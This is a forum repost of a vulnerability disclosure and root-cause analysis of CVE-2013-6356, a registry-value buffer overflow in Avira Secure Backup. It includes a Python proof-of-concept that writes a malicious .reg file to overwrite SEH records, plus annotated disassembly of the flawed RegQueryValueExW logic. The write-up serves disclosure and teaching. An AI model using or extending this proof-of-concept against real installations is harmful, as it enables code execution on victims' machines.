Jump to content
Nytro

CVE-2013-6356: Avira Secure Backup v1.0.0.1 Buffer Overflow

By Nytro, in Reverse engineering & exploit development

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

CVE-2013-6356: Avira Secure Backup v1.0.0.1 Buffer Overflow – Anatomy of a Vulnerability

Hello Followers,

Avira is one of the leading Anti-Virus vendors and also the biggest one in Germany. Security is their daily business and they’ve done a quite nice job in hardening their products. But even the toughest software may be broken sometimes icon_wink.gif . So, this time I’d like to present a common vulnerability with a really interesting (and uncommon) root cause.

Quoted from my official Full-Disclosure post:

    A buffer overflow vulnerability has been identified in Avira Secure Backup v1.0.0.1 Build 3616.

    The application loads the values of the Registry Keys “AutoUpdateDownloadFilename” and “AutoUpdateProgressFilename” from “HKEY_CURRENT_USER\Software\Avira Secure Backup” on startup but does not properly validate the length of the fetched values before using them in the further application context, which leads to a buffer overflow condition with possible persistent code execution.

    The application queries the values via a RegQueryValueExW call and a fixed buffer pointer (lpData) and a fixed buffer size pointer (lpcbData). If the input string size is greater than the predefined size, the application uses a second RegQueryValueExW call with the new buffer size set to the length of the input string, but reuses the original buffer pointer (lpData), which has not been resized. This results in overwriting memory space inlcuding SEH – records.

    An attacker needs to force the victim to import an arbitrary .reg file in order to exploit the vulnerability. Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploits will result in a denial-of-service condition. The attack scenario is persistent, because the code is executed as long as the manipulated values are loaded into the Registry.

Crashing the application!

To exploit this vulnerability, the following script creates an arbitrary .reg file, which needs to be imported into the target registry.

#!/usr/bin/python

file="poc.reg"

junk1="\xCC" * 1240

poc="Windows Registry Editor Version 5.00\n\n"

poc=poc + "[HKEY_CURRENT_USER\Software\Avira Secure Backup]\n"

poc=poc + "\"AutoUpdateProgressFilename\"=\"" + junk1 + "\""

try:

print "

[*] Creating exploit file...\n";

writeFile = open (file, "w")

writeFile.write( poc )

writeFile.close()

print "

[*] File successfully created!";

except:

print "[!] Error while creating file!";

Starting the application results in EIP control:

cve-2013-6356-1.png

via overwritten SEH records:

cve-2013-6356-2.png

Sounds like a boring strcpy() overflow ?

After importing the arbitrary .reg file created by the Python script, the Call stack of the application looks like the following on crash-time:

cve-2013-6356-3.png

The last entry clearly shows that a return address has been overwritten by the PoC code indicating that the application flow might be controlled. The last call is a ntdll.memmove triggered somewhere from within the function at 0x0043F0D2.

The complete vulnerable code part located at this address:

0043F0D2  /$ 55             PUSH EBP
0043F0D3  |. 8BEC           MOV EBP,ESP
0043F0D5  |. 83EC 10        SUB ESP,10
0043F0D8  |. 53             PUSH EBX
0043F0D9  |. 56             PUSH ESI
0043F0DA  |. 8B35 14704E00  MOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>;  ADVAPI32.RegOpenKeyExW
0043F0E0  |. 57             PUSH EDI
0043F0E1  |. 8D45 F8        LEA EAX,DWORD PTR SS:[EBP-8]
0043F0E4  |. 50             PUSH EAX                                 ; /pHandle
0043F0E5  |. 68 19000200    PUSH 20019                               ; |Access
0043F0EA  |. 33DB           XOR EBX,EBX                              ; |
0043F0EC  |. 53             PUSH EBX                                 ; |Reserved => 0
0043F0ED  |. FF75 0C        PUSH DWORD PTR SS:[EBP+C]                ; |Subkey
0043F0F0  |. 885D FF        MOV BYTE PTR SS:[EBP-1],BL               ; |
0043F0F3  |. FF75 08        PUSH DWORD PTR SS:[EBP+8]                ; |hKey
0043F0F6  |. C745 F4 200800>MOV DWORD PTR SS:[EBP-C],820             ; |
0043F0FD  |. FFD6           CALL ESI                                 ; \RegOpenKeyExW
0043F0FF  |. 8B3D 10704E00  MOV EDI,DWORD PTR DS:[<&ADVAPI32.RegQuer>;  ADVAPI32.RegQueryValueExW
0043F105  |. 85C0           TEST EAX,EAX
0043F107  |. 75 2A          JNZ SHORT Avira_Se.0043F133
0043F109  |. 8D45 F4        LEA EAX,DWORD PTR SS:[EBP-C]
0043F10C  |. 50             PUSH EAX                                 ; /pBufSize
0043F10D  |. FF75 14        PUSH DWORD PTR SS:[EBP+14]               ; |Buffer
0043F110  |. 8D45 F0        LEA EAX,DWORD PTR SS:[EBP-10]            ; |
0043F113  |. 50             PUSH EAX                                 ; |pValueType
0043F114  |. 53             PUSH EBX                                 ; |Reserved => NULL
0043F115  |. FF75 10        PUSH DWORD PTR SS:[EBP+10]               ; |ValueName
0043F118  |. FF75 F8        PUSH DWORD PTR SS:[EBP-8]                ; |hKey
0043F11B  |. FFD7           CALL EDI                                 ; \RegQueryValueExW
0043F11D  |. 85C0           TEST EAX,EAX
0043F11F  |. 75 04          JNZ SHORT Avira_Se.0043F125
0043F121  |. C645 FF 01     MOV BYTE PTR SS:[EBP-1],1
0043F125  |> FF75 F8        PUSH DWORD PTR SS:[EBP-8]                ; /hKey
0043F128  |. FF15 0C704E00  CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
0043F12E  |. 385D FF        CMP BYTE PTR SS:[EBP-1],BL
0043F131  |. 75 3B          JNZ SHORT Avira_Se.0043F16E
0043F133  |> 8D45 F8        LEA EAX,DWORD PTR SS:[EBP-8]
0043F136  |. 50             PUSH EAX
0043F137  |. 68 19010200    PUSH 20119
0043F13C  |. 53             PUSH EBX
0043F13D  |. FF75 0C        PUSH DWORD PTR SS:[EBP+C]
0043F140  |. FF75 08        PUSH DWORD PTR SS:[EBP+8]
0043F143  |. FFD6           CALL ESI
0043F145  |. 85C0           TEST EAX,EAX
0043F147  |. 75 25          JNZ SHORT Avira_Se.0043F16E
0043F149  |. 8D45 F4        LEA EAX,DWORD PTR SS:[EBP-C]
0043F14C  |. 50             PUSH EAX
0043F14D  |. FF75 14        PUSH DWORD PTR SS:[EBP+14]
0043F150  |. 8D45 F0        LEA EAX,DWORD PTR SS:[EBP-10]
0043F153  |. 50             PUSH EAX
0043F154  |. 53             PUSH EBX
0043F155  |. FF75 10        PUSH DWORD PTR SS:[EBP+10]
0043F158  |. FF75 F8        PUSH DWORD PTR SS:[EBP-8]
0043F15B  |. FFD7           CALL EDI 
0043F15D  |. 85C0           TEST EAX,EAX
0043F15F  |. 75 04          JNZ SHORT Avira_Se.0043F165
0043F161  |. C645 FF 01     MOV BYTE PTR SS:[EBP-1],1
0043F165  |> FF75 F8        PUSH DWORD PTR SS:[EBP-8]                ; /hKey
0043F168  |. FF15 0C704E00  CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
0043F16E  |> 33C0           XOR EAX,EAX
0043F170  |. 385D FF        CMP BYTE PTR SS:[EBP-1],BL
0043F173  |. 5F             POP EDI
0043F174  |. 5E             POP ESI
0043F175  |. 0F95C0         SETNE AL
0043F178  |. 5B             POP EBX
0043F179  |. C9             LEAVE
0043F17A  \. C3             RETN

Looks like there is no common strcpy() icon_wink.gif

Hunting the Bug!

The vulnerable code part needs to be divided into different parts:

0043F0D2  /$ 55             PUSH EBP
0043F0D3  |. 8BEC           MOV EBP,ESP
0043F0D5  |. 83EC 10        SUB ESP,10
0043F0D8  |. 53             PUSH EBX
0043F0D9  |. 56             PUSH ESI
0043F0DA  |. 8B35 14704E00  MOV ESI,DWORD PTR DS:[<&ADVAPI32.RegOpen>;  ADVAPI32.RegOpenKeyExW
0043F0E0  |. 57             PUSH EDI
0043F0E1  |. 8D45 F8        LEA EAX,DWORD PTR SS:[EBP-8]
0043F0E4  |. 50             PUSH EAX                                 ; /pHandle
0043F0E5  |. 68 19000200    PUSH 20019                               ; |Access
0043F0EA  |. 33DB           XOR EBX,EBX                              ; |
0043F0EC  |. 53             PUSH EBX                                 ; |Reserved => 0
0043F0ED  |. FF75 0C        PUSH DWORD PTR SS:[EBP+C]                ; |Subkey
0043F0F0  |. 885D FF        MOV BYTE PTR SS:[EBP-1],BL               ; |
0043F0F3  |. FF75 08        PUSH DWORD PTR SS:[EBP+8]                ; |hKey
0043F0F6  |. C745 F4 200800>MOV DWORD PTR SS:[EBP-C],820             ; |
0043F0FD  |. FFD6           CALL ESI

The first part queries the base key „HKEY_CURRENT_USER\Software\Avira Secure Backup“ using a CALL ESI (0x0043F0FD), which holds the function RegOpenKeyExW, that has been moved into ESI at 0x0043F0DA.

The function arguments for the RegOpenKeyExW can be found on the stack:

cve-2013-6356-4.png

The second part queries the final values:

0043F0FF  |. 8B3D 10704E00  MOV EDI,DWORD PTR DS:[<&ADVAPI32.RegQuer>;  ADVAPI32.RegQueryValueExW
0043F105  |. 85C0           TEST EAX,EAX
0043F107  |. 75 2A          JNZ SHORT Avira_Se.0043F133
0043F109  |. 8D45 F4        LEA EAX,DWORD PTR SS:[EBP-C]
0043F10C  |. 50             PUSH EAX                                 ; /pBufSize
0043F10D  |. FF75 14        PUSH DWORD PTR SS:[EBP+14]               ; |Buffer
0043F110  |. 8D45 F0        LEA EAX,DWORD PTR SS:[EBP-10]            ; |
0043F113  |. 50             PUSH EAX                                 ; |pValueType
0043F114  |. 53             PUSH EBX                                 ; |Reserved => NULL
0043F115  |. FF75 10        PUSH DWORD PTR SS:[EBP+10]               ; |ValueName
0043F118  |. FF75 F8        PUSH DWORD PTR SS:[EBP-8]                ; |hKey
0043F11B  |. FFD7           CALL EDI                                 ; \RegQueryValueExW

The function RegQueryValueExW is moved into EDI (0x0043F0FF) and later called (0x0043F11B) with the ValueName (first: “AutoUpdateProgressFilename” and in a second run “AutoUpdateDownloadFilename”) of the vulnerable key. The function arguments for the RegQueryValueExW call on the stack are:

cve-2013-6356-5.png

Let’s have a look at a basic RegQueryValueExW function call and its arguments (http://msdn.microsoft.com/en-us/library/windows/desktop/ms724911(v=vs.85).aspx)

LONG WINAPI RegQueryValueEx(
  _In_         HKEY hKey,
  _In_opt_     LPCTSTR lpValueName,
  _Reserved_   LPDWORD lpReserved,
  _Out_opt_    LPDWORD lpType,
  _Out_opt_    LPBYTE lpData,
  _Inout_opt_  LPDWORD lpcbData
);

Articol complet: https://www.rcesecurity.com/2013/11/cve-2013-6356-avira-secure-backup-v1-0-0-1-buffer-overflow-anatomy-of-a-vulnerability/

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...